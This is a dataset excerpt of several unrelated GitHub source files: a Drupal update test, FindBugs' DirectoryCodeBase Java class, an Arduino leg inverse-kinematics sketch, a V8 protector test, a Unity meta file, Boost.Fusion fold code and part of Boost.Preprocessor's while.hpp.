text
stringlengths 2
99.9k
| meta
dict |
---|---|
<?php
namespace Drupal\Tests\system\Functional\UpdateSystem;
use Drupal\Core\Database\Database;
use Drupal\Core\Url;
use Drupal\Tests\BrowserTestBase;
use Drupal\Tests\RequirementsPageTrait;
/**
* Tries to update a module which has no pre-existing schema.
*
* @group Update
* @group legacy
*/
class NoPreExistingSchemaUpdateTest extends BrowserTestBase {
use RequirementsPageTrait;
/**
 * Installs update_test_no_preexisting without recording a schema version.
 *
 * The module is enabled by rewriting the serialized core.extension config
 * row directly, bypassing the module installer, so that system.schema ends
 * up with no entry for the module.
 */
protected function setUp() {
parent::setUp();
$connection = Database::getConnection();
// Enable the update_test_no_preexisting module by altering the
// core.extension configuration directly, so that the schema version
// information is missing.
$extensions = $connection->select('config')
->fields('config', ['data'])
->condition('name', 'core.extension')
->execute()
->fetchField();
// The config row holds a PHP-serialized array; merge the module into its
// 'module' list (weight 0) and write the row straight back.
$extensions = unserialize($extensions);
$connection->update('config')
->fields([
'data' => serialize(array_merge_recursive($extensions, ['module' => ['update_test_no_preexisting' => 0]])),
])
->condition('name', 'core.extension')
->execute();
}
/**
 * Test the system module updates with no dependencies installed.
 *
 * Runs update.php against the site prepared in setUp() and checks that the
 * missing schema version is back-filled to 8001, that the update hook was
 * NOT executed, and that the user is warned to review skipped updates.
 */
public function testNoPreExistingSchema() {
// Precondition: no schema version recorded and update 8001 never ran.
$schema = \Drupal::keyValue('system.schema')->getAll();
$this->assertArrayNotHasKey('update_test_no_preexisting', $schema);
$this->assertFalse(\Drupal::state()->get('update_test_no_preexisting_update_8001', FALSE));
$update_url = Url::fromRoute('system.db_update');
require_once $this->root . '/core/includes/update.inc';
// The site might be broken at the time so logging in using the UI might
// not work, so we use the API itself.
$this->writeSettings([
'settings' => [
'update_free_access' => (object) [
'value' => TRUE,
'required' => TRUE,
],
],
]);
$this->drupalGet($update_url);
$this->updateRequirementsProblem();
// Visiting update.php back-fills the schema version to the latest update.
$schema = \Drupal::keyValue('system.schema')->getAll();
$this->assertArrayHasKey('update_test_no_preexisting', $schema);
$this->assertEquals('8001', $schema['update_test_no_preexisting']);
// The schema version has been fixed, but the update was never run.
$this->assertFalse(\Drupal::state()->get('update_test_no_preexisting_update_8001', FALSE));
$this->assertSession()->pageTextContains('Schema information for module update_test_no_preexisting was missing from the database. You should manually review the module updates and your database to check if any updates have been skipped up to, and including, update_test_no_preexisting_update_8001().');
}
}
| {
"pile_set_name": "Github"
} |
/*
* FindBugs - Find Bugs in Java programs
* Copyright (C) 2006, University of Maryland
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
package edu.umd.cs.findbugs.classfile.impl;
import java.io.*;
import java.util.Iterator;
import java.util.LinkedList;
import edu.umd.cs.findbugs.RecursiveFileSearch;
import edu.umd.cs.findbugs.classfile.ICodeBaseEntry;
import edu.umd.cs.findbugs.classfile.ICodeBaseIterator;
import edu.umd.cs.findbugs.classfile.ICodeBaseLocator;
/**
* IScannableCodeBase implementation to read resources from a filesystem
* directory.
*
* @author David Hovemeyer
*/
public class DirectoryCodeBase extends AbstractScannableCodeBase {
// Walks the filenames produced by the recursive search, converting each
// absolute filename into a codebase-relative resource name.
private class DirectoryCodeBaseIterator implements ICodeBaseIterator {
Iterator<String> fileNameIterator = rfs.fileNameIterator();
/*
 * (non-Javadoc)
 *
 * @see edu.umd.cs.findbugs.classfile.ICodeBaseIterator#hasNext()
 */
@Override
public boolean hasNext() throws InterruptedException {
return fileNameIterator.hasNext();
}
/*
 * (non-Javadoc)
 *
 * @see edu.umd.cs.findbugs.classfile.ICodeBaseIterator#next()
 */
@Override
public ICodeBaseEntry next() throws InterruptedException {
final String fileName = fileNameIterator.next();
// Make the filename relative to the directory
String resourceName = getResourceName(fileName);
// Update last modified time
File file = new File(fileName);
// lastModified() returns 0 on error; addLastModifiedTime is inherited,
// presumably it ignores bogus values — confirm in the base class.
long modTime = file.lastModified();
addLastModifiedTime(modTime);
return new DirectoryCodeBaseEntry(DirectoryCodeBase.this, resourceName);
}
}
// Root directory of this codebase; all resource names are relative to it.
private File directory;
// Recursive search rooted at 'directory'; the constructor's filter accepts
// every pathname, so every file below the root is a candidate resource.
private RecursiveFileSearch rfs;
// Ensures the filesystem is scanned at most once, on first iterator() call.
private boolean searchPerformed;
/**
 * Constructor.
 *
 * @param codeBaseLocator
 * the codebase locator for this codebase
 * @param directory
 * the filesystem directory
 * @throws IllegalArgumentException if {@code directory} is not an existing directory
 */
public DirectoryCodeBase(ICodeBaseLocator codeBaseLocator, File directory) {
super(codeBaseLocator);
if (!directory.isDirectory()) {
throw new IllegalArgumentException();
}
this.directory = directory;
this.rfs = new RecursiveFileSearch(directory.getPath(), pathname -> true);
this.searchPerformed = false;
}
/*
 * (non-Javadoc)
 *
 * @see edu.umd.cs.findbugs.classfile.IScannableCodeBase#iterator()
 */
@Override
public ICodeBaseIterator iterator() throws InterruptedException {
// Lazily perform (and cache) the directory scan on first use.
if (!searchPerformed) {
rfs.search();
searchPerformed = true;
}
return new DirectoryCodeBaseIterator();
}
/*
 * (non-Javadoc)
 *
 * @see edu.umd.cs.findbugs.classfile.ICodeBase#getPathName()
 */
@Override
public String getPathName() {
return directory.getPath();
}
/*
 * (non-Javadoc)
 *
 * @see edu.umd.cs.findbugs.classfile.ICodeBase#close()
 */
@Override
public void close() {
// Nothing to do
}
/*
 * (non-Javadoc)
 *
 * @see
 * edu.umd.cs.findbugs.classfile.ICodeBase#lookupResource(java.lang.String)
 */
@Override
public ICodeBaseEntry lookupResource(String resourceName) {
// Translate resource name, in case a resource name
// has been overridden and the resource is being accessed
// using the overridden name.
resourceName = translateResourceName(resourceName);
File file = getFullPathOfResource(resourceName);
if (!file.exists()) {
// Missing resource is reported as null, not an exception.
return null;
}
return new DirectoryCodeBaseEntry(this, resourceName);
}
/**
 * Open the named resource for reading.
 *
 * @param resourceName resource name relative to this codebase
 * @return buffered stream over the file; caller is responsible for closing it
 */
InputStream openFile(String resourceName) throws FileNotFoundException, IOException {
File path = getFullPathOfResource(resourceName);
return new BufferedInputStream(new FileInputStream(path));
}
/**
 * Get the full path of given resource.
 */
File getFullPathOfResource(String resourceName) {
return new File(directory, resourceName);
}
/**
 * Get the resource name given a full filename.
 *
 * @param fileName
 * the full filename (which must be inside the directory)
 * @return the resource name (i.e., the filename with the directory stripped
 * off)
 * @throws IllegalStateException if {@code fileName} does not start with the directory path
 */
String getResourceName(String fileName) {
// FIXME: there is probably a more robust way to do this
// Strip off the directory part.
String dirPath = directory.getPath();
if (!fileName.startsWith(dirPath)) {
throw new IllegalStateException("Filename " + fileName + " not inside directory " + dirPath);
}
// The problem here is that we need to take the relative part of the
// filename
// and break it into components that we can then reconstruct into
// a resource name (using '/' characters to separate the components).
// Unfortunately, the File class does not make this task particularly
// easy.
String relativeFileName = fileName.substring(dirPath.length());
// Decompose via File.getName()/getParentFile() so platform separators are
// handled, then rebuild with '/'. Empty components (e.g. from the leading
// separator left on relativeFileName) append nothing, so the result has
// no leading slash.
File file = new File(relativeFileName);
LinkedList<String> partList = new LinkedList<>();
do {
partList.addFirst(file.getName());
} while ((file = file.getParentFile()) != null);
StringBuilder buf = new StringBuilder();
for (String part : partList) {
if (buf.length() > 0) {
buf.append('/');
}
buf.append(part);
}
return buf.toString();
}
/*
 * (non-Javadoc)
 *
 * @see java.lang.Object#toString()
 */
@Override
public String toString() {
return directory.getPath();
}
}
| {
"pile_set_name": "Github"
} |
// Gait waypoints cycled through by loop(); units are whatever calculAngles()
// uses for its leg-segment lengths (a=70, b=111) — presumably millimetres,
// TODO confirm.
float XPosition[2] = {80, 80}; // horizontal foot-position targets
float ZPosition[2] = {35,60}; // vertical foot-position targets
float X0; // current X target handed to calculAngles()
float Z0; // current Z target handed to calculAngles()
int pulsewidth1; // output of calculAngles(): pulse width for the first joint's servos
int pulsewidth2; // output of calculAngles(): pulse width for the second joint's servos
// One-time init: open the serial link to the servo controller and drive all
// servos to a known starting pose. Command format "#<ch> P<pulse> T<ms>"
// matches moveservo() below — NOTE(review): looks like an SSC-32 style
// controller protocol, confirm against the hardware.
void setup() {
Serial.begin (115200);
Serial.println ("#0 P680 #3 P2013 #4 P1500 #11 P1500 #12 P2013 #15 P680 T800" ); //Set servos to starting position
Serial.println ("#16 P680 #19 P2013 #20 P1500 #27 P1500 #28 P2013 #31 P680 T800");
// Give the 800 ms move time to complete (with margin) before loop() starts.
delay (2000);
}
// Main gait cycle: for each waypoint, compute joint pulse widths once and
// send the same pose to all legs — channels 0/15/16/31 share pulsewidth1 and
// channels 3/12/19/28 share pulsewidth2 (presumably the four legs of a
// quadruped — confirm against the wiring).
void loop() {
for (int i = 0; i <= 1; i++){
X0 = XPosition[i];
Z0 = ZPosition[i];
calculAngles (X0, Z0); // Calls function Calcul angles
moveservo (0, pulsewidth1, 800); // Calls function to move the servo
moveservo (15, pulsewidth1, 800);
moveservo (16, pulsewidth1, 800);
moveservo (31, pulsewidth1, 800);
moveservo (3, pulsewidth2, 800);
moveservo (12, pulsewidth2, 800);
moveservo (19, pulsewidth2, 800);
moveservo (28, pulsewidth2, 800);
// Wait out the commanded 800 ms move before the next waypoint.
delay (800);
}
}
// Two-link (femur/tibia) inverse kinematics for one leg.
//
// Inputs are the desired foot position in the leg's plane: X0 = horizontal
// offset, Z0 = vertical offset (same units as the link lengths a and b).
// Results are written to the globals pulsewidth1 (first joint) and
// pulsewidth2 (second joint) as servo pulse widths; beta and epsilon are
// also echoed to the serial monitor.
//
// BUG FIX: the second parameter was declared as `Y0` and never used — the
// body silently read the *global* Z0, so the function only worked because
// loop() happened to assign that global first. Naming the parameter Z0
// makes the function actually consume its second argument, matching X0.
// Call sites are positional, so no caller changes.
//
// NOTE(review): there is no guard for unreachable targets — if the foot
// position is outside the leg's reach, the acos() arguments leave [-1, 1]
// and the results are NaN. Upstream waypoints appear to stay in range;
// confirm before feeding arbitrary positions.
void calculAngles(float X0, float Z0) {
const float a = 70; //this value is known (femur)
const float b = 111; //this value is known (tibia)
const float pi = 3.141592653;
// Straight-line distance from hip to foot.
float hypo = sqrt((sq(X0) + sq(Z0)));
// Law of cosines for the angle at the hip between femur and hip-foot line,
// converted to degrees.
float alpha = (acos((sq(a)+sq(hypo)-sq(b))/(2*a*hypo)))*180/pi;
// Direction of the hip-to-foot line.
float gamma = (atan2(Z0,X0))*180/pi;
// First servo angle.
float beta = 90 - alpha + gamma;
Serial.print ("Beta = "); // prints this text in the serial monitor
Serial.println (beta); // prints beta value in serial monitor
// Interior knee angle via law of cosines; the servo is driven by its
// supplement.
float delta = (acos((sq(a)+sq(b)-sq(hypo))/(2*a*b)))*180/pi;
float epsilon = 180 - delta;
Serial.print ("Epsilon = ");
Serial.println(epsilon);
// Map degrees to pulse width: ~11 us per degree with a 560 us offset.
// lround() rounds to nearest; the old code's long -> float -> int
// round-trip added nothing, so the results are cast to int directly.
pulsewidth1 = (int) lround((beta * 11) + 560);
pulsewidth2 = (int) lround((epsilon * 11) + 560);
}
// Emit one servo move command over serial, e.g. "#5 P1500 T800\n".
//
// servo     - controller channel number
// positions - target pulse width (us)
// time      - move duration (ms)
//
// The exact byte sequence IS the controller protocol (same format as the
// startup commands in setup()), so the print order must not change.
void moveservo (int servo, int positions, int time) {
Serial.print ("#");
Serial.print (servo);
Serial.print (" P");
Serial.print (positions);
Serial.print (" T");
Serial.println (time);
}
| {
"pile_set_name": "Github"
} |
// Copyright 2017 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// Flags: --allow-natives-syntax --no-stress-opt
// Generic store helper: the string-receiver call below drives its keyed
// store IC megamorphic, so later stores through f() take the generic path
// rather than specializing on a receiver map.
function f(a, i, v) { a[i] = v; }
f("make it generic", 0, 0);
(function TestIsConcatSpreadableProtector() {
var o = {length: 1, '0': 99};
// %OptimizeObjectForAddingMultipleProperties normalizes o's properties
// (presumably to dictionary mode — V8 internal, confirm).
%OptimizeObjectForAddingMultipleProperties(o, 0);
// A generic store of Symbol.isConcatSpreadable must still be observed by
// concat: o is then spread as if it were an array.
f(o, Symbol.isConcatSpreadable, true);
assertEquals([99], [].concat(o));
})();
(function TestSpeciesProtector() {
function MyArray() {}
assertTrue(%ArraySpeciesProtector());
// Redefining Array.prototype.constructor via the generic store path must
// invalidate the array species protector.
f(Array.prototype, "constructor", MyArray);
assertFalse(%ArraySpeciesProtector());
})();
| {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: f1b13d7a80660504a858ea24cfa418c6
ShaderImporter:
userData:
| {
"pile_set_name": "Github"
} |
/*=============================================================================
Copyright (c) 2001-2011 Joel de Guzman
Copyright (c) 2007 Dan Marsden
Copyright (c) 2009-2010 Christopher Schmidt
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
This is an auto-generated file. Do not edit!
==============================================================================*/
/* SFINAE enabler used by result_of_it_fold below. Normally it names
   `typename T::type`; on MSVC < 1500 it degrades to `void` (that compiler's
   workaround path instead adds an extra bool template parameter to
   disambiguate the specializations). */
# if BOOST_WORKAROUND (BOOST_MSVC, < 1500)
# define BOOST_FUSION_FOLD_IMPL_ENABLER(T) void
# else
# define BOOST_FUSION_FOLD_IMPL_ENABLER(T) typename T::type
# endif
namespace boost { namespace fusion
{
namespace detail
{
// Compile-time result computation for the fold: walks SeqSize iterator
// steps, threading the accumulated State type through F's result_of.
// The trailing `typename = void` (plus, on MSVC < 1500, a bool flag) is the
// SFINAE slot the two partial specializations hang off.
template<int SeqSize, typename It, typename State, typename F, typename = void
# if BOOST_WORKAROUND (BOOST_MSVC, < 1500)
, bool = SeqSize == 0
# endif
>
struct result_of_it_fold
{};
// Base case: zero elements left — the result is the accumulated State.
template<typename It, typename State, typename F>
struct result_of_it_fold<0,It,State,F
, typename boost::enable_if_has_type<BOOST_FUSION_FOLD_IMPL_ENABLER(State)>::type
# if BOOST_WORKAROUND (BOOST_MSVC, < 1500)
, true
# endif
>
{
typedef typename State::type type;
};
// Recursive case: one step — advance the iterator and replace State with
// the result type of F(state&, deref(it)).
template<int SeqSize, typename It, typename State, typename F>
struct result_of_it_fold<SeqSize,It,State,F
, typename boost::enable_if_has_type<
# if BOOST_WORKAROUND (BOOST_MSVC, >= 1500)
typename boost::disable_if_c<SeqSize == 0, State>::type::type
# else
BOOST_FUSION_FOLD_IMPL_ENABLER(State)
# endif
>::type
# if BOOST_WORKAROUND (BOOST_MSVC, < 1500)
, false
# endif
>
: result_of_it_fold<
SeqSize-1
, typename result_of::next<It>::type
, boost::result_of<
F(
typename add_reference<typename State::type>::type,
typename fusion::result_of::deref<It const>::type
)
>
, F
>
{};
// Runtime fold base case: no elements left, return the accumulated state.
// The step count is carried as mpl::int_<N> so overload resolution picks
// the terminating overload at N == 0.
template<typename It, typename State, typename F>
BOOST_CONSTEXPR BOOST_FUSION_GPU_ENABLED
inline typename result_of_it_fold<
0
, It
, State
, F
>::type
it_fold(mpl::int_<0>, It const&, typename State::type state, F&)
{
return state;
}
// Runtime fold step: apply f(state, *it) left-to-right, recursing with the
// advanced iterator and decremented count. lazy_enable_if_c keeps this
// overload out of the N == 0 case.
template<typename It, typename State, typename F, int SeqSize>
BOOST_CONSTEXPR BOOST_FUSION_GPU_ENABLED
inline typename lazy_enable_if_c<
SeqSize != 0
, result_of_it_fold<
SeqSize
, It
, State
, F
>
>::type
it_fold(mpl::int_<SeqSize>, It const& it, typename State::type state, F& f)
{
return it_fold<
typename result_of::next<It>::type
, boost::result_of<
F(
typename add_reference<typename State::type>::type,
typename fusion::result_of::deref<It const>::type
)
>
, F
>(
mpl::int_<SeqSize-1>()
, fusion::next(it)
, f(state, fusion::deref(it))
, f
);
}
// Entry-point result metafunction: only defined for unsegmented fusion
// sequences (is_sequence && !is_segmented); otherwise stays empty so the
// public fold overloads SFINAE away.
template<typename Seq, typename State, typename F
, bool = traits::is_sequence<Seq>::value
, bool = traits::is_segmented<Seq>::value>
struct result_of_fold
{};
template<typename Seq, typename State, typename F>
struct result_of_fold<Seq, State, F, true, false>
: result_of_it_fold<
result_of::size<Seq>::value
, typename result_of::begin<Seq>::type
, add_reference<State>
, F
>
{};
// Runtime entry point: kicks off it_fold at begin(seq) with the sequence
// size as the mpl::int_ step counter.
template<typename Seq, typename State, typename F>
BOOST_CONSTEXPR BOOST_FUSION_GPU_ENABLED
inline typename result_of_fold<Seq, State, F>::type
fold(Seq& seq, State& state, F& f)
{
return it_fold<
typename result_of::begin<Seq>::type
, add_reference<State>
, F
>(
typename result_of::size<Seq>::type()
, fusion::begin(seq)
, state
, f
);
}
}
namespace result_of
{
// Public result-of metafunction for fusion::fold; forwards to the detail
// implementation above.
template<typename Seq, typename State, typename F>
struct fold
: detail::result_of_fold<Seq, State, F>
{};
}
// Public fold API: the four overloads cover every const combination of
// sequence and initial state, all forwarding to detail::fold. State is
// passed through by reference via the result_of machinery; F is taken by
// value here and by reference internally.
template<typename Seq, typename State, typename F>
BOOST_CONSTEXPR BOOST_FUSION_GPU_ENABLED
inline typename result_of::fold<
Seq
, State const
, F
>::type
fold(Seq& seq, State const& state, F f)
{
return detail::fold<Seq, State const, F>(seq, state, f);
}
template<typename Seq, typename State, typename F>
BOOST_CONSTEXPR BOOST_FUSION_GPU_ENABLED
inline typename result_of::fold<
Seq const
, State const
, F
>::type
fold(Seq const& seq, State const& state, F f)
{
return detail::fold<Seq const, State const, F>(seq, state, f);
}
template<typename Seq, typename State, typename F>
BOOST_CONSTEXPR BOOST_FUSION_GPU_ENABLED
inline typename result_of::fold<
Seq
, State
, F
>::type
fold(Seq& seq, State& state, F f)
{
return detail::fold<Seq, State, F>(seq, state, f);
}
template<typename Seq, typename State, typename F>
BOOST_CONSTEXPR BOOST_FUSION_GPU_ENABLED
inline typename result_of::fold<
Seq const
, State
, F
>::type
fold(Seq const& seq, State& state, F f)
{
return detail::fold<Seq const, State, F>(seq, state, f);
}
}}
| {
"pile_set_name": "Github"
} |
# /* Copyright (C) 2001
# * Housemarque Oy
# * http://www.housemarque.com
# *
# * Distributed under the Boost Software License, Version 1.0. (See
# * accompanying file LICENSE_1_0.txt or copy at
# * http://www.boost.org/LICENSE_1_0.txt)
# */
#
# /* Revised by Paul Mensonides (2002) */
#
# /* See http://www.boost.org for most recent version. */
#
# ifndef BOOST_PREPROCESSOR_CONTROL_WHILE_HPP
# define BOOST_PREPROCESSOR_CONTROL_WHILE_HPP
#
# include <boost/preprocessor/cat.hpp>
# include <boost/preprocessor/config/config.hpp>
# include <boost/preprocessor/debug/error.hpp>
# include <boost/preprocessor/detail/auto_rec.hpp>
# include <boost/preprocessor/list/fold_left.hpp>
# include <boost/preprocessor/list/fold_right.hpp>
# include <boost/preprocessor/logical/bitand.hpp>
#
# /* BOOST_PP_WHILE */
#
# /* Documentation-only signature (never compiled): BOOST_PP_WHILE(pred, op,
#  * state) repeatedly expands op(d, state) while pred(d, state) is non-zero,
#  * where d is the next available recursion depth. */
# if 0
# define BOOST_PP_WHILE(pred, op, state)
# endif
#
# /* The real definition dispatches to BOOST_PP_WHILE_<n>, where n is the
#  * first free recursion depth found by BOOST_PP_AUTO_REC probing the
#  * predicate BOOST_PP_WHILE_P over depths 1..256. */
# define BOOST_PP_WHILE BOOST_PP_CAT(BOOST_PP_WHILE_, BOOST_PP_AUTO_REC(BOOST_PP_WHILE_P, 256))
#
# /* BOOST_PP_WHILE_P(n): 1 iff depth n is still available, i.e. neither
#  * WHILE nor the LIST_FOLD machinery (which WHILE shares depths with) is
#  * currently expanding at depth n. The CHECK_ tables below make an active
#  * expansion yield 0. EDG also tracks LIST_FOLD_RIGHT. */
# if BOOST_PP_CONFIG_FLAGS() & BOOST_PP_CONFIG_EDG()
# define BOOST_PP_WHILE_P(n) BOOST_PP_BITAND(BOOST_PP_CAT(BOOST_PP_WHILE_CHECK_, BOOST_PP_WHILE_ ## n(BOOST_PP_WHILE_F, BOOST_PP_NIL, BOOST_PP_NIL)), BOOST_PP_BITAND(BOOST_PP_CAT(BOOST_PP_LIST_FOLD_LEFT_CHECK_, BOOST_PP_LIST_FOLD_LEFT_ ## n(BOOST_PP_NIL, BOOST_PP_NIL, BOOST_PP_NIL)), BOOST_PP_CAT(BOOST_PP_LIST_FOLD_RIGHT_CHECK_, BOOST_PP_LIST_FOLD_RIGHT_ ## n(BOOST_PP_NIL, BOOST_PP_NIL, BOOST_PP_NIL))))
# else
# define BOOST_PP_WHILE_P(n) BOOST_PP_BITAND(BOOST_PP_CAT(BOOST_PP_WHILE_CHECK_, BOOST_PP_WHILE_ ## n(BOOST_PP_WHILE_F, BOOST_PP_NIL, BOOST_PP_NIL)), BOOST_PP_CAT(BOOST_PP_LIST_FOLD_LEFT_CHECK_, BOOST_PP_LIST_FOLD_LEFT_ ## n(BOOST_PP_NIL, BOOST_PP_NIL, BOOST_PP_NIL)))
# endif
#
# /* Always-false predicate used when probing a depth. */
# define BOOST_PP_WHILE_F(d, _) 0
#
# /* The per-depth BOOST_PP_WHILE_1 .. _256 implementations live in a
#  * compiler-specific detail header. */
# if BOOST_PP_CONFIG_FLAGS() & BOOST_PP_CONFIG_EDG()
# include <boost/preprocessor/control/detail/edg/while.hpp>
# elif BOOST_PP_CONFIG_FLAGS() & BOOST_PP_CONFIG_MSVC()
# include <boost/preprocessor/control/detail/msvc/while.hpp>
# elif BOOST_PP_CONFIG_FLAGS() & BOOST_PP_CONFIG_DMC()
# include <boost/preprocessor/control/detail/dmc/while.hpp>
# else
# include <boost/preprocessor/control/detail/while.hpp>
# endif
#
# /* Depth 257 does not exist: recursion exhausted. */
# define BOOST_PP_WHILE_257(p, o, s) BOOST_PP_ERROR(0x0001)
#
# /* Probe result when depth n was free: the probe expands fully to
#  * BOOST_PP_NIL, and CHECK_BOOST_PP_NIL is 1 (= available). */
# define BOOST_PP_WHILE_CHECK_BOOST_PP_NIL 1
#
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_1(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_2(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_3(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_4(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_5(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_6(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_7(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_8(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_9(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_10(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_11(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_12(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_13(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_14(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_15(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_16(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_17(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_18(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_19(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_20(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_21(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_22(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_23(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_24(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_25(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_26(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_27(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_28(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_29(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_30(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_31(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_32(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_33(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_34(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_35(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_36(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_37(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_38(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_39(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_40(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_41(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_42(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_43(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_44(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_45(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_46(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_47(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_48(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_49(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_50(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_51(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_52(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_53(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_54(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_55(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_56(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_57(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_58(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_59(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_60(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_61(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_62(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_63(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_64(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_65(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_66(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_67(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_68(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_69(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_70(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_71(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_72(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_73(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_74(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_75(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_76(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_77(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_78(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_79(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_80(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_81(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_82(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_83(p, o, s) 0
